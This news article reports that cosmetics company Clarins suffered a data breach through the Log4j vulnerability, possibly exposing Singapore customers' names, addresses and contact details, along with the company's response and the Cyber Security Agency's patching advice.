Cosmetics company Clarins hit by data security incident, 'may involve' Singapore customers’ personal information
SINGAPORE: French cosmetics company Clarins has been hit by a data security incident which "may involve" Singapore customers’ personal information, it said on Tuesday (Jan 11).
The company said in a statement on its website that the incident was due to a critical vulnerability in a widely used software known as Log4j.
Log4j, which is an open-source software used to support activity-logging in many Java-based applications, was used to manage Clarins’ database containing personal data of its Singapore customers. Clarins became aware of the security breach when a staff member could not access its database.
“Unfortunately, while this vulnerability affecting our database was promptly patched within hours of release of the security patch, it appears that the server has been compromised after the vulnerability was publicly exposed,” it said.
The data accessed may have included customers’ personal information such as name, address, email, phone number and Clarins loyalty programme status, it added.
Based on its "investigations to-date", the data did not include any password, credit card or payment information as the server accessed “did not include such information”, said Clarins.
Minister for Communications and Information Josephine Teo said last month that Singapore authorities are checking and patching government systems "thoroughly" to guard against the Log4j vulnerability.
In its statement, Clarins said it deeply regrets the incident, adding that it has “promptly” implemented security patches to prevent a recurrence of such an attack.
The company added that it is “working closely” with law and security experts to ensure that the incident is properly addressed. It has also notified the security breach to the Singapore Personal Data Protection Commission (PDPC), which said it is investigating the incident.
Responding to CNA's queries, Clarins said: "An investigation is currently underway in conjunction with the authorities following the notifications we made."
Clarins also advised customers to change their password and to treat all unsolicited calls, emails and SMS with caution – particularly those involving payment details or password.
In a reply to CNA's queries, the Cyber Security Agency (CSA) urges organisations and product developers to implement mitigation measures to protect their systems and networks.
Organisations with products that utilise Log4j should patch to the latest updates immediately and determine if the software is used in other instances within their system, CSA said.
They should also continue "active monitoring of their systems for anomalous activity", as well as deploy Protective Network Monitoring and review System Logs.
Organisations can refer to SingCERT’s advisory for more details.